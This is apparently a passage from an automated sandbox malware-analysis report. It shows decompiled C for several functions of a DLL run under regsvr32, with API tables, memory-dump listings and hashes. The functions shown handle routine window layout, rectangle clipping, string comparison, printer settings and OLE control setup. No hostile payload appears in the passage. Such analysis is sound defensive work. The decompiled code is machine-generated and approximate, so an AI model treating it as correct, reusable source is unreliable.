						if(_t83 >= _a4 && _t83 <= _a8 && _t63 != 0) {
							SendMessageA(_t86, 0x361, 0,  &_v40);
						}
					} else {
						_v8 = _t86;
					}
					_t56 = GetWindow(_t86, 2);
					_t86 = _t56;
				}
				if(_a16 != 1) {
					if(_a12 != 0 && _v8 != 0) {
						_t57 = E10041F78(_t87, _v8);
						if(_a16 == 2) {
							_t80 = _a20;
							_v36.left = _v36.left +  *_t80;
							_v36.top = _v36.top +  *((intOrPtr*)(_t80 + 4));
							_v36.right = _v36.right -  *((intOrPtr*)(_t80 + 8));
							_v36.bottom = _v36.bottom -  *((intOrPtr*)(_t80 + 0xc));
						}
						 *((intOrPtr*)( *_t57 + 0x60))( &_v36, 0);
						_t56 = E10043D03( &_v40, _v8,  &_v36);
					}
					if(_v40 != 0) {
						_t56 = EndDeferWindowPos(_v40);
					}
				} else {
					if(_a28 == 0) {
						_t56 = _a20;
						 *((intOrPtr*)(_t56 + 8)) = _v20;
						 *((intOrPtr*)(_t56 + 4)) = 0;
						 *_t56 = 0;
						 *((intOrPtr*)(_t56 + 0xc)) = _v16;
					} else {
						_t56 = CopyRect(_a20,  &_v36);
					}
				}
				return _t56;
			}

0x10043bd4
0x10043bde
0x10043be1
0x10043be4
0x10043be7
0x10043bea
0x10043bfc
0x10043bec
0x10043bef
0x10043bf0
0x10043bf1
0x10043bf2
0x10043bf2
0x10043c06
0x10043c15
0x10043c08
0x10043c10
0x10043c10
0x10043c1c
0x10043c22
0x10043c26
0x10043c2b
0x10043c31
0x10043c32
0x10043c35
0x10043c3d
0x10043c47
0x10043c5d
0x10043c5d
0x10043c3f
0x10043c3f
0x10043c3f
0x10043c66
0x10043c6c
0x10043c6c
0x10043c74
0x10043ca3
0x10043cad
0x10043cb6
0x10043cb8
0x10043cbd
0x10043cc3
0x10043cc9
0x10043ccf
0x10043ccf
0x10043cdb
0x10043ce9
0x10043ce9
0x10043cf1
0x10043cf6
0x10043cf6
0x10043c76
0x10043c79
0x10043c8a
0x10043c90
0x10043c96
0x10043c99
0x10043c9b
0x10043c7b
0x10043c82
0x10043c82
0x10043c79
0x10043d00

APIs

GetClientRect.USER32 ref: 10043BFC
BeginDeferWindowPos.USER32 ref: 10043C0A
GetTopWindow.USER32(?), ref: 10043C1C
GetDlgCtrlID.USER32 ref: 10043C2B
SendMessageA.USER32 ref: 10043C5D
GetWindow.USER32(00000000,00000002), ref: 10043C66
CopyRect.USER32(?,?), ref: 10043C82

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Rect$BeginClientCopyCtrlDeferMessageSend
String ID:
API String ID: 3332788312-0
Opcode ID: 10d677f8b70f656ae4c1f8888d6ccc514fd2b046f72622e5ac2e5f41016206d0
Instruction ID: 67f415fa878297adcf491aed3cbd3ae325d28b621736cb152e39359eb100eceb
Opcode Fuzzy Hash: 10d677f8b70f656ae4c1f8888d6ccc514fd2b046f72622e5ac2e5f41016206d0
Instruction Fuzzy Hash: 2341017190021AEFCF05DF98C9C58AEBBB5FF08345B21816AE905F6250C731AE41CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 1000EB99 Relevance: 12.1, APIs: 8, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E1000EB99(struct HDC__* _a4, RECT* _a8, intOrPtr _a12, intOrPtr _a16) {
				struct tagPOINT _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				int _t33;
				int _t38;
				void* _t39;
				int _t42;
				struct HDC__* _t59;

				if(E1000E8C9() == 0) {
					if(_a12 == 0) {
						L10:
						return 0;
					}
					_v28.left = 0;
					_v28.top = 0;
					_v28.right = GetSystemMetrics(0);
					_t33 = GetSystemMetrics(1);
					_t59 = _a4;
					_v28.bottom = _t33;
					if(_t59 == 0) {
						if(_a8 == 0) {
							L15:
							return _a12(0x12340042, _t59,  &_v28, _a16);
						}
						_t38 = IntersectRect( &_v28,  &_v28, _a8);
						L13:
						if(_t38 != 0) {
							goto L15;
						}
						L14:
						_t39 = 1;
						return _t39;
					}
					_t42 = GetClipBox(_t59,  &_v44);
					if(_t42 == 0) {
						goto L10;
					}
					if(_t42 == 1) {
						goto L14;
					}
					if(GetDCOrgEx(_t59,  &_v12) == 0) {
						goto L10;
					}
					OffsetRect( &_v28,  ~(_v12.x),  ~(_v12.y));
					if(IntersectRect( &_v28,  &_v28,  &_v44) == 0) {
						goto L14;
					}
					if(_a8 == 0) {
						goto L15;
					}
					_t38 = IntersectRect( &_v28,  &_v28, _a8);
					goto L13;
				}
				return  *0x100947ec(_a4, _a8, _a12, _a16);
			}

0x1000eba9
0x1000ebc7
0x1000ec50
0x00000000
0x1000ec50
0x1000ebd4
0x1000ebd7
0x1000ebde
0x1000ebe1
0x1000ebe3
0x1000ebe6
0x1000ebeb
0x1000ec57
0x1000ec73
0x00000000
0x1000ec80
0x1000ec64
0x1000ec6a
0x1000ec6c
0x00000000
0x00000000
0x1000ec6e
0x1000ec70
0x00000000
0x1000ec70
0x1000ebf8
0x1000ebfa
0x00000000
0x00000000
0x1000ebfd
0x00000000
0x00000000
0x1000ec0c
0x00000000
0x00000000
0x1000ec1e
0x1000ec3a
0x00000000
0x00000000
0x1000ec3f
0x00000000
0x00000000
0x1000ec4c
0x00000000
0x1000ec4c
0x00000000

APIs

GetSystemMetrics.USER32 ref: 1000EBDA
GetSystemMetrics.USER32 ref: 1000EBE1
GetClipBox.GDI32(?,?), ref: 1000EBF2
GetDCOrgEx.GDI32(?,?), ref: 1000EC04
OffsetRect.USER32 ref: 1000EC1E
IntersectRect.USER32(?,?,?), ref: 1000EC36
IntersectRect.USER32(?,?,?), ref: 1000EC4C

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Rect$IntersectMetricsSystem$ClipOffset
String ID:
API String ID: 2304384279-0
Opcode ID: b9aa175e605dd8b926ca2b411d24d830d69008e89dd693f1017c74f25addb992
Instruction ID: 4133406b719b1383cc16cc1e25a625eb75625f1a4f57efca7216a9c73483986b
Opcode Fuzzy Hash: b9aa175e605dd8b926ca2b411d24d830d69008e89dd693f1017c74f25addb992
Instruction Fuzzy Hash: 3531E97290065EABEF01DFA5CD85CEF7BBCFB48790F104512F905E2114D7329A869BA0

Uniqueness

Uniqueness Score: -1.00%

Function 10048B53 Relevance: 12.1, APIs: 8, Instructions: 73
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10048B53(char* _a4, CHAR* _a8) {
				short _v524;
				short _v1044;
				short _v1564;
				void* _t19;
				int _t20;
				char* _t29;
				int _t31;
				char* _t34;
				void* _t37;
				void* _t39;

				_t34 = _a4;
				if(lstrcmpiA(_t34, _a8) != 0) {
					L10:
					return 0;
				}
				if(GetSystemMetrics(0x2a) == 0) {
					L8:
					_t19 = 1;
					return _t19;
				}
				_t20 = lstrlenA(_t34);
				if(_t20 != lstrlenA(_a8)) {
					goto L10;
				}
				_t31 = GetThreadLocale();
				GetStringTypeA(_t31, 1, _t34, 0xffffffff,  &_v524);
				GetStringTypeA(_t31, 4, _t34, 0xffffffff,  &_v1044);
				GetStringTypeA(_t31, 1, _a8, 0xffffffff,  &_v1564);
				_t29 = _t34;
				if( *_t34 == 0) {
					goto L8;
				}
				_t37 = 0;
				while(( *(_t39 + _t37 - 0x410) & 0x00000080) == 0 ||  *((intOrPtr*)(_t39 + _t37 - 0x208)) ==  *((intOrPtr*)(_t39 + _t37 - 0x618))) {
					_t37 = _t37 + 2;
					if( *_t29 != 0) {
						continue;
					}
					goto L8;
				}
				goto L10;
			}

0x10048b5f
0x10048b6e
0x10048c12
0x00000000
0x10048c12
0x10048b7e
0x10048c08
0x10048c0a
0x00000000
0x10048c0a
0x10048b8b
0x10048b96
0x00000000
0x00000000
0x10048ba4
0x10048bb3
0x10048bc2
0x10048bd3
0x10048bd8
0x10048bda
0x00000000
0x00000000
0x10048bdc
0x10048bde
0x10048bfc
0x10048c06
0x00000000
0x00000000
0x00000000
0x10048c06
0x00000000

APIs

lstrcmpiA.KERNEL32(?,?,00000000), ref: 10048B66
GetSystemMetrics.USER32 ref: 10048B76
lstrlenA.KERNEL32(?), ref: 10048B8B
lstrlenA.KERNEL32(?), ref: 10048B92
GetThreadLocale.KERNEL32 ref: 10048B98
GetStringTypeA.KERNEL32(00000000,00000001,?,000000FF,?), ref: 10048BB3
GetStringTypeA.KERNEL32(00000000,00000004,?,000000FF,?), ref: 10048BC2
GetStringTypeA.KERNEL32(00000000,00000001,?,000000FF,?), ref: 10048BD3

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: StringType$lstrlen$LocaleMetricsSystemThreadlstrcmpi
String ID:
API String ID: 1373347803-0
Opcode ID: f14adaf3a4509ebadaf28d5a81961a044e4b2a7dad4ceaec43c9c5551623407e
Instruction ID: 2249e1ef6d0133958510a020d2de15ec5aa45a65b10e2bc6ad3f49544be2fa4c
Opcode Fuzzy Hash: f14adaf3a4509ebadaf28d5a81961a044e4b2a7dad4ceaec43c9c5551623407e
Instruction Fuzzy Hash: D311DD7150016A7AEB1197A44CC8FDF3B9CEB457B0F204672FA25D61D1DA708981CBB4

Uniqueness

Uniqueness Score: -1.00%

Function 10046163 Relevance: 12.1, APIs: 8, Instructions: 65
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E10046163(void* __ecx, char* _a4) {
				void* _v8;
				void* _t15;
				void* _t20;
				void* _t35;

				_push(__ecx);
				_t35 = __ecx;
				_t15 =  *(__ecx + 0x98);
				if(_t15 != 0) {
					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
					if(_t15 == 0) {
						_t15 = OpenPrinterA(_a4,  &_v8, 0);
						if(_t15 != 0) {
							_t18 =  *(_t35 + 0x94);
							if( *(_t35 + 0x94) != 0) {
								L1004E4F3(_t18);
							}
							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
							 *(_t35 + 0x94) = _t20;
							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
								L1004E4F3( *(_t35 + 0x94));
								 *(_t35 + 0x94) = 0;
							}
							_t15 = ClosePrinter(_v8);
						}
					}
				}
				return _t15;
			}

0x10046166
0x10046169
0x1004616e
0x10046176
0x1004618f
0x10046197
0x100461a1
0x100461a8
0x100461aa
0x100461b2
0x100461b5
0x100461b5
0x100461cc
0x100461d3
0x100461ee
0x100461f6
0x100461fb
0x100461fb
0x10046204
0x10046204
0x100461a8
0x10046197
0x1004620d

APIs

GlobalLock.KERNEL32 ref: 10046183
lstrcmpA.KERNEL32(?,?), ref: 1004618F
OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 100461A1
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 100461C4
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 100461CC
GlobalLock.KERNEL32 ref: 100461D9
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 100461E6
ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 10046204

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Global$DocumentLockProperties$AllocCloseOpenPrinterPrinter.lstrcmp
String ID:
API String ID: 105606236-0
Opcode ID: 35c2e32fcc82a279d7df555fc285cacfad091feabff78061cc43009e153df900
Instruction ID: 3c90523a29d3aea72d7380a876634e493a0f1f16f5553bfe89b0080cb10099b5
Opcode Fuzzy Hash: 35c2e32fcc82a279d7df555fc285cacfad091feabff78061cc43009e153df900
Instruction Fuzzy Hash: 49117375500614FBEB119BB5DD89EAF7ABDFF89740F20442AF609D1011EA71AD40A724

Uniqueness

Uniqueness Score: -1.00%

Function 10010164 Relevance: 10.7, APIs: 7, Instructions: 231
memoryCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E10010164(void* __esi) {
				void* __ebx;
				int* _t130;
				int _t135;
				intOrPtr _t136;
				int _t137;
				int* _t138;
				int _t141;
				int _t164;
				signed char _t165;
				int _t166;
				intOrPtr _t171;
				int _t175;
				int _t177;
				int _t178;
				void* _t179;
				int* _t182;
				void* _t198;
				int* _t202;
				short _t203;
				int _t210;
				void* _t212;
				struct tagRECT _t213;
				int* _t214;
				signed int _t218;
				int* _t222;
				int* _t223;
				void* _t224;

				_t212 = __esi;
				E1001A9E0(0x10076ae9, _t224);
				_t210 =  *(_t224 + 0x14);
				_t175 = 0;
				_t130 = _t210 + 0x12;
				 *(_t224 - 0x18) = _t130;
				if( *(_t224 + 0x10) != 0) {
					 *(_t224 - 0x64) =  *((intOrPtr*)(_t210 + 8));
					 *((intOrPtr*)(_t224 - 0x60)) =  *((intOrPtr*)(_t210 + 4));
					 *((short*)(_t224 - 0x5c)) =  *((intOrPtr*)(_t210 + 0xc));
					 *((short*)(_t224 - 0x5a)) =  *((intOrPtr*)(_t210 + 0xe));
					 *((short*)(_t224 - 0x56)) =  *_t130;
					_t202 = _t210 + 0x18;
					 *((short*)(_t224 - 0x58)) =  *(_t210 + 0x10);
					 *((short*)(_t224 - 0x54)) =  *((intOrPtr*)(_t210 + 0x14));
					_t210 = _t224 - 0x64;
					 *(_t224 - 0x18) = _t202;
				}
				_t203 =  *((short*)(_t210 + 0xa));
				_push(_t212);
				_t213 =  *((short*)(_t210 + 8));
				 *((intOrPtr*)(_t224 - 0x34)) =  *((short*)(_t210 + 0xe)) + _t203;
				 *(_t224 - 0x40) = _t213;
				 *((intOrPtr*)(_t224 - 0x3c)) = _t203;
				 *((intOrPtr*)(_t224 - 0x38)) =  *((short*)(_t210 + 0xc)) + _t213;
				_t135 = MapDialogRect( *( *((intOrPtr*)(_t224 + 8)) + 0x1c), _t224 - 0x40);
				_t214 =  *(_t224 + 0x1c);
				 *(_t224 + 0x10) = _t175;
				if( *((intOrPtr*)(_t224 + 0x20)) >= 4) {
					_t178 =  *_t214;
					 *((intOrPtr*)(_t224 + 0x20)) =  *((intOrPtr*)(_t224 + 0x20)) - 4;
					_t214 =  &(_t214[1]);
					if(_t178 > 0) {
						__imp__#4(_t214, _t178);
						_t179 = _t178 + _t178;
						 *(_t224 + 0x10) = _t135;
						_t214 = _t214 + _t179;
						 *((intOrPtr*)(_t224 + 0x20)) =  *((intOrPtr*)(_t224 + 0x20)) - _t179;
					}
					_t175 = 0;
				}
				_t136 =  *0x1008f630; // 0x1008f644
				 *(_t224 - 0x14) = _t175;
				 *((intOrPtr*)(_t224 - 0x10)) = _t136;
				 *(_t224 - 4) = _t175;
				 *(_t224 - 0x1c) = _t175;
				 *(_t224 - 0x20) = _t175;
				 *(_t224 - 0x24) = _t175;
				if( *((short*)(_t224 + 0x18)) == 0x37a ||  *((short*)(_t224 + 0x18)) == 0x37b) {
					_t137 =  *_t214;
					_t214 =  &(_t214[3]);
					 *(_t224 - 0x2c) = _t137;
					_t48 = _t137 - 0xc; // 0x1008f638
					_t182 = _t48;
					 *(_t224 + 0x1c) = _t182;
					if(_t182 > _t175) {
						do {
							_t164 =  *_t214;
							_t177 = _t214[1];
							 *(_t224 + 0x1c) =  *(_t224 + 0x1c) - 6;
							 *(_t224 - 0x28) = _t164;
							_t214 =  &(_t214[1]);
							if(_t164 != 0x80010001) {
								_t165 = E10045FEF(0x1c);
								 *(_t224 - 0x30) = _t165;
								__eflags = _t165;
								 *(_t224 - 4) = 1;
								if(_t165 == 0) {
									_t166 = 0;
									__eflags = 0;
								} else {
									_t166 = E1001522A(_t165,  *(_t224 - 0x14),  *(_t224 - 0x28), _t177);
								}
								_t68 = _t224 - 4;
								 *_t68 =  *(_t224 - 4) & 0x00000000;
								__eflags =  *_t68;
								 *(_t224 - 0x14) = _t166;
							} else {
								_t222 =  &(_t214[1]);
								 *(_t224 - 0x20) =  *_t214;
								_t223 =  &(_t222[3]);
								 *(_t224 - 0x24) =  *_t222;
								E10045AA7(_t224 - 0x10, _t223);
								_t198 = 0xffffffef;
								 *(_t224 - 0x1c) = _t177;
								_t171 =  *((intOrPtr*)( *((intOrPtr*)(_t224 - 0x10)) - 8));
								 *(_t224 + 0x1c) =  *(_t224 + 0x1c) + _t198 - _t171;
								_t214 = _t223 + _t171 + 1;
							}
						} while ( *(_t224 + 0x1c) > 0);
						_t137 =  *(_t224 - 0x2c);
						_t175 = 0;
					}
					 *((intOrPtr*)(_t224 + 0x20)) =  *((intOrPtr*)(_t224 + 0x20)) - _t137;
					 *((intOrPtr*)(_t224 + 0x18)) =  *((intOrPtr*)(_t224 + 0x18)) + 0xfffc;
				}
				_t138 =  *(_t224 - 0x18);
				_push(_t224 - 0x50);
				_push(_t138);
				_t242 =  *_t138 - 0x7b;
				if( *_t138 != 0x7b) {
					__imp__CLSIDFromProgID();
				} else {
					__imp__CLSIDFromString();
				}
				 *(_t224 + 0x1c) = _t138;
				L1005753F(_t224 - 0x8c, _t242, _t214,  *((intOrPtr*)(_t224 + 0x20)), _t175);
				 *(_t224 - 4) = 2;
				asm("sbb esi, esi");
				 *(_t224 + 0x14) = _t175;
				_t218 =  ~( *((intOrPtr*)(_t224 + 0x18)) - 0x378) & _t224 - 0x0000008c;
				if( *(_t224 + 0x1c) >= _t175 && E1000ED9A( *((intOrPtr*)(_t224 + 8))) != 0 && E1000EFA8( *((intOrPtr*)( *((intOrPtr*)(_t224 + 8)) + 0x34)), _t175, _t224 - 0x50, _t175,  *_t210, _t224 - 0x40,  *(_t210 + 0x10) & 0x0000ffff, _t218, 0 |  *((short*)(_t224 + 0x18)) == 0x00000377,  *(_t224 + 0x10), _t224 + 0x14) != 0) {
					E10011ABE( *(_t224 + 0x14), 1);
					SetWindowPos( *( *(_t224 + 0x14) + 0x20),  *(_t224 + 0xc), _t175, _t175, _t175, _t175, 0x13);
					 *( *(_t224 + 0x14) + 0x8c) =  *(_t224 - 0x14);
					E10045A57(_t175,  *(_t224 + 0x14) + 0x9c, _t224, _t224 - 0x10);
					 *((short*)( *(_t224 + 0x14) + 0x90)) =  *(_t224 - 0x1c);
					 *( *(_t224 + 0x14) + 0x94) =  *(_t224 - 0x20);
					 *( *(_t224 + 0x14) + 0x98) =  *(_t224 - 0x24);
				}
				if( *(_t224 + 0x10) != _t175) {
					__imp__#6( *(_t224 + 0x10));
				}
				_t141 =  *(_t224 + 0x14);
				if(_t141 != _t175) {
					_t175 =  *(_t141 + 0x20);
				}
				 *(_t224 - 4) =  *(_t224 - 4) & 0x00000000;
				L100575B8(_t224 - 0x8c);
				 *(_t224 - 4) =  *(_t224 - 4) | 0xffffffff;
				E1004591E(_t224 - 0x10);
				 *[fs:0x0] =  *((intOrPtr*)(_t224 - 0xc));
				return _t175;
			}

0x10010164
0x10010169
0x10010176
0x10010179
0x1001017e
0x10010181
0x10010184
0x1001018c
0x10010192
0x10010199
0x100101a3
0x100101ab
0x100101b3
0x100101b6
0x100101ba
0x100101be
0x100101c1
0x100101c1
0x100101c4
0x100101d2
0x100101d3
0x100101d7
0x100101e3
0x100101e9
0x100101ec
0x100101ef
0x100101f9
0x100101fc
0x100101ff
0x10010201
0x10010203
0x10010207
0x1001020c
0x10010210
0x10010216
0x10010218
0x1001021b
0x1001021d
0x1001021d
0x10010220
0x10010220
0x10010222
0x10010227
0x1001022a
0x10010233
0x10010236
0x10010239
0x1001023c
0x1001023f
0x1001024d
0x1001024f
0x10010252
0x10010255
0x10010255
0x1001025a
0x1001025d
0x10010263
0x10010263
0x10010265
0x10010269
0x10010271
0x10010274
0x1001027a
0x100102ae
0x100102b4
0x100102b7
0x100102b9
0x100102bd
0x100102cf
0x100102cf
0x100102bf
0x100102c8
0x100102c8
0x100102d1
0x100102d1
0x100102d1
0x100102d5
0x1001027c
0x1001027e
0x10010281
0x10010289
0x1001028d
0x10010290
0x1001029a
0x1001029b
0x1001029e
0x100102a3
0x100102a6
0x100102a6
0x100102d8
0x100102de
0x100102e1
0x100102e1
0x100102e3
0x100102e6
0x100102e6
0x100102ed
0x100102f3
0x100102f4
0x100102f5
0x100102f9
0x10010303
0x100102fb
0x100102fb
0x100102fb
0x10010313
0x10010317
0x1001032b
0x10010332
0x10010334
0x10010337
0x1001033c
0x1001038b
0x1001039f
0x100103ab
0x100103be
0x100103ca
0x100103d7
0x100103e3
0x100103e3
0x100103ed
0x100103f2
0x100103f2
0x100103f8
0x100103fd
0x100103ff
0x100103ff
0x10010402
0x1001040c
0x10010411
0x10010418
0x10010424
0x1001042c

APIs

__EH_prolog.LIBCMT ref: 10010169
MapDialogRect.USER32(?,?), ref: 100101EF
SysAllocStringLen.OLEAUT32(?,00000000), ref: 10010210
CLSIDFromString.OLE32(0000FFFC,?), ref: 100102FB
CLSIDFromProgID.OLE32(0000FFFC,?), ref: 10010303
SetWindowPos.USER32(00000004,?,00000000,00000000,00000000,00000000,00000013), ref: 1001039F
SysFreeString.OLEAUT32(?), ref: 100103F2

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
